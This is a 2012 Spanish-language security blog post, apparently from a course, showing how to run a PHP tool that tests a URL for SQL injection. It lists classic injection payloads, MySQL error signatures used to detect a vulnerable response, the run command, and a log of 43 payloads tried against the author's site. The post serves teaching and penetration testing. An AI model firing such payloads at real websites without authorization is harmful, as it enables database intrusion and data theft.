Sql Injection Tool - Bonus Topic

De james jara - agosto 28, 2012

Buenas.. este tema es un bonus en el curso dado que aun no hacemos sql injection, pero aqui esta..

Como usarlo.. dado que es un script CLI. en la consola ejecutamos

1. Rellenamos el archivo de inyecciones

Ejemplo.

tail -f sqli_dorks.txt
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a

agregue mas inyecciones en este archivo , una por linea.

2. Rellenamos el archivo de errores.

Ejemplo

tail -f sqli_errors.txt
error mysql_error
mysql_error
Warning
mysql_fetch_array()
supplied argument
You have an error in your SQL syntax;
agregue mas errores en este archivo , uno por linea.

3. Ejecutamos el script de sql injection discover

php gsi0.com_sqli_injection_discover.php -isqli_dorks.txt -esqli_errors.txt -t"www.jamesjara.com/?articuloid=123{inyectme}&foo=bar"

Resultado:
[root@localhost sql-injection]# php gsi0.com_sqli_injection_discover.php -isqli_dorks.txt -esqli_errors.txt -t"www.jamesjara.com/?articuloid=123{inyectme}&foo=ba"
==== welcome gsi0.com ARMY by @jamesjara , wait.. the pentesting is starting...
<><><> - - Executing new dork #0 - [admin'--]
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #1 - [' or 1=1--]
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #2 - ['" or 1=1--]
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #3 - [' union select 1, 'Eyeless', 'ez2do', 1--]
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #4 - [admin'--]
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #5 - [administrator'--]
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #6 - [superuser'--]
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #7 - [test'--]
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #8 - [' or 0=0 --]
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #9 - [' or 0=0 --']
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #10 - [' or 0=0 #]
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #11 - [" or 0=0 --]
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #12 - [" or 0=0 --']
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #13 - ['" or 0=0 --]
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #14 - [or 0=0 --]
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #15 - [' or 0=0 #]
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #16 - [" or 0=0 #]
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #17 - [or 0=0 #]
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #18 - [' or 'x'='x]
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #19 - [" or "x"="x]
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #20 - [') or ('x'='x]
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #21 - [" or 1=1--]
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #22 - [or 1=1--]
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #23 - [' or a=a--']
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #24 - [' or a=a #]
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #25 - [' or a=a--]
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #26 - [' or "a"="a]
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #27 - [' or 'a'='a]
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #28 - [" or "a"="a]
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #29 - [') or ('a'='a]
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #30 - [") or ("a"="a]
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #31 - [hi" or "a"="a]
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #32 - [hi" or 1=1 --]
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #33 - [hi' or 1=1 --]
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #34 - [hi' or 'a'='a]
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #35 - [hi') or ('a'='a]
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #36 - [hi") or ("a"="a]
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #37 - [' or 1=1--]
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #38 - [" or 1=1--]
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #39 - [or 1=1--]
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #40 - [' or 'a'='a]
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #41 - [" or "a"="a]
<><><><><> - - - - - Result: negative
<><><> - - Executing new dork #42 - [') or ('a'='a]
<><><><><> - - - - - Result: negative
========================================
==== #0 injections founded ...
==== welcome gsi0.com ARMY by @jamesjara , pentesting FINISHED ,check results.txt ...

Bueno, gracias por su tiempo

-- James jara, @jamesjara

Comentarios

Unknown28 de agosto de 2012, 21:49
Simple y util!
ResponderEliminar
Respuestas

Añadir comentario

Buscar este blog

Grupo Seguridad Informatica Costa Rica